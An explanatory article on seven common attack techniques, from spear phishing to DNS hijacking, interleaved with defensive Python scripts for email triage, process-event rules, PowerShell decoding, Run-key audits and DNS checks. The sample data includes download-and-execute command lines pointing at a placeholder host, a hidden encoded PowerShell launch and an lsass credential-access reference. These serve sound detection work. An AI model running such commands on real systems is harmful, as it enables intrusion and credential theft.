Cyberattacks are often painted as the sorcery of computer geniuses in dark hoodies, sitting in a basement in front of a multi-monitor setup. More often than not, however, they are the work of ordinary skilled individuals who focus their efforts on finding existing loopholes and exploiting them for financial gain or to cause service disruption. Recently, a new breed of attacker has begun to take shape: one assisted by nation-state actors to achieve strategic geopolitical objectives. Amid the endless reporting of cyberattacks, it is worth pausing to look at the fundamental elements of how these attacks work. After all, without understanding the adversary and their techniques, one cannot defend against them.
An attacker looking to target specific individuals or organizations can choose from many attack techniques. Depending on the target's unique attack surface and the attacker's motives, certain attack vectors will prove more effective than others. In this article, we give an overview of the seven most dangerous attack techniques used by modern threat actors.
Spear Phishing Attack
Spear phishing is a type of phishing attack that uses email or other electronic communication directed at a very specific target, either an individual or an organization. The name derives from the analogy of a spear hitting its target with pin-point accuracy. The motive behind this kind of attack can be financial gain, data theft, or even cyber espionage.
Most commonly, spear phishing attacks are leveraged to:
- Deliver malicious documents
- Deliver a malicious URL in the message body or in an attachment
- Collect inside information or ask for assistance
- Deliver a malicious piece of code or software
Spear phishing has been a core component of many major cyberattacks over the years, and the attackers behind several major incidents relied on it. Payroll phishing scams and employee impersonation attacks in recent years also continue to leverage this technique.
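The checks a mail-security team typically runs on a message like the ones described above (sender domain, Reply-To, attachment type, link text versus link target) can be scripted. The following is an added example, not code from the article; the organisation domain, the lookalike heuristic, the risky-extension list and the sample message are all constructed assumptions.

```python
"""Header and content triage for a spear-phishing style message.

Added example: checks a mail-security team might run on an inbound message.
The organisation domain, the lookalike heuristic and the sample message are
all constructed for this example.
"""
import email
import re
from email import policy
from email.utils import parseaddr
from urllib.parse import urlsplit

INTERNAL_DOMAIN = "example.com"   # assumed organisation domain
RISKY_EXTENSIONS = {".exe", ".js", ".vbs", ".hta", ".scr", ".lnk", ".iso", ".docm", ".xlsm"}
ANCHOR_RE = re.compile(r'<a\s[^>]*href="([^"]+)"[^>]*>(.*?)</a>', re.I | re.S)

# Constructed sample: lookalike sender domain, mismatched Reply-To,
# macro-enabled attachment and a link whose text does not match its target.
SAMPLE_EMAIL = """\
From: "Jane Doe (CEO)" <jane.doe@examp1e-mail.net>
Reply-To: payments@examp1e-mail.net
To: finance@example.com
Subject: Urgent: updated payroll file
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="XYZ"

--XYZ
Content-Type: text/html; charset="utf-8"

<p>Please review the attachment and confirm at
<a href="http://examp1e-mail.net/login">https://portal.example.com</a></p>
--XYZ
Content-Type: application/octet-stream; name="payroll_update.docm"
Content-Disposition: attachment; filename="payroll_update.docm"

AAAA
--XYZ--
"""


def normalise_label(domain: str) -> str:
    """Reduce a domain's first label to a comparable form: lowercase, common
    digit-for-letter swaps undone, non-letters removed."""
    label = domain.lower().split(".")[0]
    label = label.translate(str.maketrans({"1": "l", "0": "o", "3": "e", "5": "s"}))
    return re.sub(r"[^a-z]", "", label)


def triage(raw: str, internal_domain: str = INTERNAL_DOMAIN) -> list[str]:
    """Return a list of finding codes for the raw RFC 5322 message."""
    msg = email.message_from_string(raw, policy=policy.default)
    findings = []

    # 1. Sender domain that imitates the organisation's own domain.
    _, from_addr = parseaddr(msg.get("From", ""))
    sender_domain = from_addr.rsplit("@", 1)[-1].lower()
    if sender_domain != internal_domain and normalise_label(internal_domain) in normalise_label(sender_domain):
        findings.append(f"lookalike-sender-domain:{sender_domain}")

    # 2. Replies silently redirected to a different mailbox.
    _, reply_addr = parseaddr(msg.get("Reply-To", ""))
    if reply_addr and reply_addr.lower() != from_addr.lower():
        findings.append("reply-to-mismatch")

    # 3. Attachment types that can carry code or macros.
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        if any(name.endswith(ext) for ext in RISKY_EXTENSIONS):
            findings.append(f"risky-attachment:{name}")

    # 4. Links whose visible text is a URL on a different host than the real target.
    body = msg.get_body(preferencelist=("html", "plain"))
    if body is not None:
        for href, text in ANCHOR_RE.findall(body.get_content()):
            shown = re.sub(r"<[^>]+>", "", text).strip()
            if "://" in shown and urlsplit(shown).hostname != urlsplit(href).hostname:
                findings.append(f"link-text-mismatch:{urlsplit(href).hostname}")
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_EMAIL):
        print(finding)
```

None of these checks is conclusive on its own; they are triage signals that raise a message's priority for analyst review, and the lookalike heuristic in particular needs tuning to the organisation's real domain and its legitimate partner domains.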
Living Off the Land
In recent times, attackers have increasingly begun to abuse the legitimate tools used by system administrators. Dubbed “Living Off the Land,” this technique repurposes system tools that are typically pre-installed or whitelisted to conduct stealthy attacks. Because such tools look legitimate, this kind of attack is very difficult to detect. Defenders also cannot simply block these tools outright, as they are often an essential part of their own workflow.
Most existing security solutions are also poor at detecting malicious use of system tools, so attackers using this technique can hide in plain sight. It is also worth noting that attribution is difficult, since attackers of all kinds use similar techniques and tools.
A famous campaign leveraging this technique was the Petya/NotPetya ransomware attack of 2017. The ransomware was delivered through a software supply chain attack as the initial step: the attackers compromised the update process of an accounting software program widely used in Ukraine, resulting in a large number of Petya/NotPetya infections in the country.
Credential Dumping
Credential dumping is a technique in which attackers obtain login credentials, in plain text or as hashes, directly from the operating system or from software. Using those credentials, attackers can move laterally across the targeted network and access sensitive information.
Among the many variations of this technique, the most common implementations focus on collecting hashed credentials, plaintext credentials, or accessing secret key material.
Notorious threat actor groups such as the FIN7 and MuddyWater groups are known to use this technique in their attack campaigns.
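Because the binaries involved are legitimate, detection of both living-off-the-land activity and credential-access attempts usually rests on context: which parent launched the tool, which switches it was given, and what it references. The following rule set is an added example, not code from the article; the Sysmon-like JSON-lines event format, the four rules, the allow-listed parents and the sample events are all constructed assumptions.

```python
"""Rule-based review of process-creation events for living-off-the-land
and credential-access behaviour.

Added example, not from the article. The Sysmon-like JSON-lines event format,
the rules and the sample events are constructed for this example.
"""
import json
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# Parents that legitimately reference the credential store on this (assumed) baseline.
LSASS_ALLOWED_PARENTS = {"services.exe", "wininit.exe", "msmpeng.exe"}
ENCODED_RE = re.compile(r"(?i)\s-(?:e|ec|enc[a-z]*)\s")
CERTUTIL_RE = re.compile(r"(?i)-(?:urlcache|decode|encode)\b")

# Constructed sample events, one JSON object per line (raw string so that the
# JSON escapes for backslashes survive). Event 4 uses placeholder arguments.
SAMPLE_EVENTS = r"""
{"Image":"C:\\Windows\\System32\\svchost.exe","ParentImage":"C:\\Windows\\System32\\services.exe","CommandLine":"svchost.exe -k netsvcs","User":"NT AUTHORITY\\SYSTEM"}
{"Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentImage":"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE","CommandLine":"powershell.exe -w hidden -nop -enc SQBFAFgA","User":"CORP\\alice"}
{"Image":"C:\\Windows\\System32\\certutil.exe","ParentImage":"C:\\Windows\\System32\\cmd.exe","CommandLine":"certutil.exe -urlcache -split -f http://placeholder.invalid/a.txt a.txt","User":"CORP\\alice"}
{"Image":"C:\\Windows\\System32\\rundll32.exe","ParentImage":"C:\\Windows\\System32\\cmd.exe","CommandLine":"rundll32.exe placeholder.dll,PlaceholderExport lsass.exe","User":"CORP\\alice"}
"""


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


# Each rule is (name, predicate over one event); order determines report order.
RULES = [
    ("office-spawns-script-host",
     lambda e: basename(e["ParentImage"]) in OFFICE_APPS and basename(e["Image"]) in SCRIPT_HOSTS),
    ("powershell-encoded-command",
     lambda e: basename(e["Image"]) in {"powershell.exe", "pwsh.exe"}
     and ENCODED_RE.search(e["CommandLine"]) is not None),
    ("certutil-download-or-decode",
     lambda e: basename(e["Image"]) == "certutil.exe" and CERTUTIL_RE.search(e["CommandLine"]) is not None),
    ("lsass-reference-from-unexpected-parent",
     lambda e: "lsass" in e["CommandLine"].lower()
     and basename(e["ParentImage"]) not in LSASS_ALLOWED_PARENTS),
]


def evaluate(events_jsonl: str) -> list[tuple[int, str]]:
    """Return (event number, rule name) pairs for every rule that fires."""
    hits = []
    for number, line in enumerate(events_jsonl.strip().splitlines(), start=1):
        if not line.strip():
            continue
        event = json.loads(line)
        for rule_name, predicate in RULES:
            if predicate(event):
                hits.append((number, rule_name))
    return hits


if __name__ == "__main__":
    for number, rule_name in evaluate(SAMPLE_EVENTS):
        print(f"event {number}: {rule_name}")
```

The value of this approach is in the parent/child and argument context rather than the binary name, which is exactly what signature-based tooling keyed on file hashes misses; the trade-off is that every rule needs an environment-specific allow-list (the parent list here is one such assumption) to keep false positives manageable.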
Connection Proxy
One prevalent technique, used both for malicious purposes and to hide their tracks, involves the use of proxies. A connection proxy directs the flow of network traffic between systems or acts as an intermediary for network communications. Such a proxy network might be used within a single organization or across organizations based on trust relationships.
Threat actors can exploit proxies to monitor, access, manipulate, or remove specific information flowing through their target networks. They can also use them to hide their command and control communication or to direct their traffic through less attributable access points.
Variations of this technique are also used to conduct Watering Hole attacks or attacks on key supply-chain entities such as Content Delivery Networks (CDNs).
PowerShell
PowerShell is an interactive command-line interface and scripting environment included by default in the Windows operating system. It can be used to invoke local processes, access system information, execute malicious code, or even download and run malicious executables from the internet.
Attackers can use it to pass encoded payloads via the command line or to access and execute remote malicious resources. Because of PowerShell's diverse capabilities, it features in many different kinds of attacks; the often-quoted rise of fileless malware in recent times is largely built on the abuse of PowerShell.
Around 2016, many state-sponsored threat actors began using PowerShell to craft fileless malware attacks that run entirely in memory and leave no traces on disk. The use of PowerShell scripts has been on the rise ever since. Turla, a cyberespionage group believed to operate from Russia, was found targeting EU diplomats in attacks reported in May 2019. The group used weaponized PowerShell scripts to load and execute malware executables and libraries directly in memory. PowerShell continues to be a tool of choice for attackers to implement fileless malware, download malicious payloads, or move laterally across a target network.
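An encoded payload passed on the command line is opaque in process logs until it is decoded, so a first analyst step is to recover the script from the -EncodedCommand argument (base64 over UTF-16LE) and scan it for the usual download-and-execute primitives. The following is an added example, not code from the article; the indicator list, the stealth-switch pattern and the two sample command lines are constructed assumptions.

```python
"""Decode and inspect a PowerShell -EncodedCommand argument from a recorded
process command line.

Added example, not from the article. The command lines are constructed; the
indicator keywords are a starting list that a defender would extend.
"""
import base64
import re

# powershell.exe accepts -EncodedCommand, -ec, -e and unambiguous prefixes of
# "EncodedCommand" (assumed from the documented parameter set).
ENCODED_ARG_RE = re.compile(r"(?i)(?:^|\s)[-/](?:e|ec|enc[a-z]*)\s+([A-Za-z0-9+/=]+)")
# Switches that hide the console window or skip profile/interaction.
STEALTH_SWITCH_RE = re.compile(r"(?i)\s-(?:w(?:indowstyle)?\s+hidden|nop(?:rofile)?|noni(?:nteractive)?)\b")
INDICATORS = ("invoke-expression", "iex", "downloadstring", "downloadfile",
              "frombase64string", "net.webclient", "bitstransfer")


def encode_for_powershell(script: str) -> str:
    """The form PowerShell expects: base64 over UTF-16LE. Used here only to
    build the constructed samples."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded script, or None when there is no encoded argument or
    it does not decode as base64/UTF-16LE."""
    match = ENCODED_ARG_RE.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse(cmdline: str) -> dict:
    """Decode the argument, then look for indicators in the decoded script and
    in the rest of the command line (the base64 blob itself is excluded so that
    random substrings of it cannot match)."""
    decoded = decode_encoded_command(cmdline)
    outer = ENCODED_ARG_RE.sub(" ", cmdline)
    haystack = ((decoded or "") + " " + outer).lower()
    return {
        "decoded": decoded,
        "indicators": sorted(k for k in INDICATORS if k in haystack),
        "stealth_switches": STEALTH_SWITCH_RE.search(cmdline) is not None,
    }


# Constructed samples: one routine administrative one-liner, one downloader pattern.
BENIGN_SCRIPT = "Get-Service | Where-Object Status -eq 'Running'"
SUSPICIOUS_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/stage.ps1')"
BENIGN_CMDLINE = "powershell.exe -EncodedCommand " + encode_for_powershell(BENIGN_SCRIPT)
SUSPICIOUS_CMDLINE = "powershell.exe -w hidden -nop -enc " + encode_for_powershell(SUSPICIOUS_SCRIPT)

if __name__ == "__main__":
    for sample in (BENIGN_CMDLINE, SUSPICIOUS_CMDLINE):
        print(analyse(sample))
```

Keyword matching on the decoded script is only a first filter: attackers split and concatenate strings to defeat it, which is why PowerShell's own Script Block Logging, which records the de-obfuscated code at execution time, is the more reliable source once it is enabled.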
Persistence
A common tactic of attackers is to maintain their presence on, and control over, the target system without being detected for as long as possible. Maintaining persistence is especially vital for attackers who need an extended period of time to spread information-stealing trojans and/or multiple backdoors, so that their access to the target systems is never interrupted.
To achieve persistence, attackers can employ different techniques such as:
- Adding entries to the ‘run keys’ in Windows Registry
- Adding malicious executables or scripts as default startup processes
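Run-key entries can be exported to a .reg text file and audited offline against a baseline, which is a cheap way to spot the persistence mechanisms listed above. The following is an added example, not code from the article; the export, the heuristics (user-writable paths, script hosts, encoded arguments, system binary names outside the Windows directory) and the allow-list of known-good value names are constructed assumptions.

```python
"""Audit Run-key autostart entries from a .reg text export.

Added example, not part of the article. The export, the heuristics and the
allow-list are constructed assumptions; real estates baseline their own
known-good entries.
"""
import re

SECTION_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"="(?P<data>.*)"$')
RUN_KEY_RE = re.compile(r"\\run(?:once)?$", re.I)
ENCODED_RE = re.compile(r"(?i)\s-(?:e|ec|enc[a-z]*)\s")
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}
SYSTEM_BINARIES = {"svchost.exe", "lsass.exe", "csrss.exe", "explorer.exe", "winlogon.exe"}
USER_WRITABLE_HINTS = ("\\appdata\\", "%appdata%", "%localappdata%", "%temp%", "\\temp\\", "\\programdata\\")
ALLOWLIST = {"OneDrive", "SecurityHealth"}        # assumed baseline of known-good value names

# Constructed .reg export (raw string so the .reg escaping is preserved).
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"Updater"="powershell.exe -w hidden -enc SQBFAFgA"
"SyncHelper"="C:\\Users\\alice\\AppData\\Roaming\\svchost.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="C:\\Windows\\system32\\SecurityHealthSystray.exe"
"Backup"="\"C:\\Program Files\\BackupTool\\agent.exe\" --service"
'''


def parse_run_entries(reg_text: str) -> list[tuple[str, str, str]]:
    """Return (key path, value name, unescaped command) for entries under Run/RunOnce keys."""
    entries, section = [], None
    for line in reg_text.splitlines():
        line = line.strip()
        m = SECTION_RE.match(line)
        if m:
            section = m.group(1)
            continue
        m = VALUE_RE.match(line)
        if m and section and RUN_KEY_RE.search(section):
            data = re.sub(r"\\(.)", r"\1", m.group("data"))   # undo .reg escaping of \ and "
            entries.append((section, m.group("name"), data))
    return entries


def executable_of(command: str) -> str:
    """First token of the command: a quoted path or the first whitespace-delimited word."""
    m = re.match(r'"([^"]+)"|(\S+)', command)
    return (m.group(1) or m.group(2)) if m else ""


def assess(entries, allowlist=ALLOWLIST) -> dict[str, list[str]]:
    """Map '<key>\\<name>' to the reasons an entry deserves a closer look."""
    findings = {}
    for section, name, command in entries:
        if name in allowlist:
            continue
        exe = executable_of(command).lower()
        base = exe.replace("/", "\\").rsplit("\\", 1)[-1]
        reasons = []
        if any(hint in exe for hint in USER_WRITABLE_HINTS):
            reasons.append("user-writable-path")
        if base in SCRIPT_HOSTS:
            reasons.append("script-host")
        if ENCODED_RE.search(command):
            reasons.append("encoded-command")
        if base in SYSTEM_BINARIES and "\\windows\\" not in exe:
            reasons.append("system-binary-name-outside-windows-dir")
        if reasons:
            findings[f"{section}\\{name}"] = reasons
    return findings


if __name__ == "__main__":
    for entry, reasons in assess(parse_run_entries(SAMPLE_REG)).items():
        print(entry, "->", ", ".join(reasons))
```

Note that legitimate software (OneDrive in the sample) also installs itself under a user-writable path, so the user-writable heuristic is only useful once a known-good baseline is in place; without the allow-list the same entry is reported.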
DNS Hijacking
Domain Name System (DNS) hijacking is yet another attack technique that allows attackers to cause large-scale damage to an organization or group of users. In this technique, attackers manipulate an entity's DNS records or domain registration without the knowledge of its owners. Legitimate users trying to reach the entity are then redirected to whatever malicious resources the attackers choose.
Attackers can do this by overriding the default DNS configuration of a target system or its local router so that it points to a malicious DNS server under their control. Another approach is to compromise trusted DNS servers and change the DNS records stored on them so as to redirect traffic on a large scale. Additionally, attackers can manipulate the communication between a user and a trusted DNS server so as to point the user to malicious websites.
In the first half of 2019, several countries, including the US and the UK, sounded the alarm about threat actors conducting DNS hijacking against both regular users and targeted organizations. It remains a credible threat that can have a large impact on its targets.
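Each of the three hijacking paths above has a corresponding defensive check: the resolver configuration against an approved list, the answers returned against a record baseline, and the response against the query that was actually sent. The following is an added example, not code from the article; the approved resolvers, the record baseline, the resolv.conf text and the DNS response bytes (built with a small wire-format encoder so the parser can be exercised offline) are all constructed assumptions.

```python
"""Checks for the three DNS hijacking paths described above.

Added example, not part of the article. The resolver allow-list, the record
baseline and the response bytes are all constructed for this example.
"""
import struct
from ipaddress import ip_address

APPROVED_RESOLVERS = {"10.0.0.53", "10.0.1.53"}            # assumed corporate resolvers
BASELINE = {"portal.example.com": {"203.0.113.10"}}          # assumed expected A records
SAMPLE_RESOLV_CONF = "search corp.example.com\nnameserver 10.0.0.53\nnameserver 198.51.100.9\n"


def unexpected_resolvers(conf_text: str, approved=APPROVED_RESOLVERS) -> list[str]:
    """Path 1: report nameserver entries that are not on the approved list."""
    found = []
    for line in conf_text.splitlines():
        parts = line.split()
        if len(parts) >= 2 and parts[0] == "nameserver":
            found.append(parts[1])
    return [r for r in found if r not in approved]


def encode_name(name: str) -> bytes:
    """DNS wire-format name: length-prefixed labels, terminated by a zero byte."""
    out = b"".join(bytes([len(label)]) + label.encode() for label in name.rstrip(".").split("."))
    return out + b"\x00"


def build_a_response(txid: int, name: str, ips, ttl: int = 300) -> bytes:
    """Constructed DNS response: header, one question, one A record per address.
    Each answer name is a compression pointer (0xC00C) back to the question name."""
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, len(ips), 0, 0)
    question = encode_name(name) + struct.pack("!HH", 1, 1)       # QTYPE=A, QCLASS=IN
    answers = b"".join(
        b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, ttl, 4) + ip_address(ip).packed for ip in ips
    )
    return header + question + answers


def read_name(data: bytes, offset: int):
    """Decode a possibly compressed name; return (name, offset after the name)."""
    labels, jumped, end = [], False, None
    while True:
        length = data[offset]
        if length & 0xC0 == 0xC0:                       # compression pointer
            pointer = struct.unpack("!H", data[offset:offset + 2])[0] & 0x3FFF
            if not jumped:
                end = offset + 2
            jumped, offset = True, pointer
            continue
        offset += 1
        if length == 0:
            break
        labels.append(data[offset:offset + length].decode())
        offset += length
    return ".".join(labels), (end if jumped else offset)


def parse_a_answers(data: bytes):
    """Return (transaction id, [(name, ipv4), ...]) from a response message."""
    txid, _flags, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", data[:12])
    offset = 12
    for _ in range(qdcount):
        _, offset = read_name(data, offset)
        offset += 4                                      # skip QTYPE and QCLASS
    answers = []
    for _ in range(ancount):
        name, offset = read_name(data, offset)
        rtype, rclass, _ttl, rdlen = struct.unpack("!HHIH", data[offset:offset + 10])
        offset += 10
        rdata = data[offset:offset + rdlen]
        offset += rdlen
        if rtype == 1 and rclass == 1:                   # A record, class IN
            answers.append((name, str(ip_address(rdata))))
    return txid, answers


def check_response(sent_txid: int, response: bytes, baseline=BASELINE) -> list[str]:
    """Paths 2 and 3: flag answers that diverge from the record baseline and
    responses whose transaction id does not match the query we sent."""
    txid, answers = parse_a_answers(response)
    findings = []
    if txid != sent_txid:
        findings.append("txid-mismatch")
    for name, ip in answers:
        if name not in baseline:
            findings.append(f"unexpected-name:{name}")
        elif ip not in baseline[name]:
            findings.append(f"unexpected-address:{name}={ip}")
    return findings


if __name__ == "__main__":
    print(unexpected_resolvers(SAMPLE_RESOLV_CONF))
    print(check_response(0x1A2B, build_a_response(0x1A2B, "portal.example.com", ["198.51.100.7"])))
```

The transaction-id comparison is the minimum a stub resolver performs and is easily satisfied by an attacker who can see the query; DNSSEC validation, and monitoring of the authoritative records and registrar account for the organisation's own domains, are the stronger controls against the second and third paths.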
The Bottom Line
The first step in preventing cyberattacks is to gain insight into how threat actors operate. A mere black-box understanding of cyber threats leads to inefficient efforts and misguided investments for organizations. As attackers continue to advance their operations with newer and more sophisticated techniques, defenders must stay abreast of the evolving threat landscape. Ultimately, a sound knowledge of adversary tactics, techniques, and procedures lays the foundation for a strong cyber defense in any organization.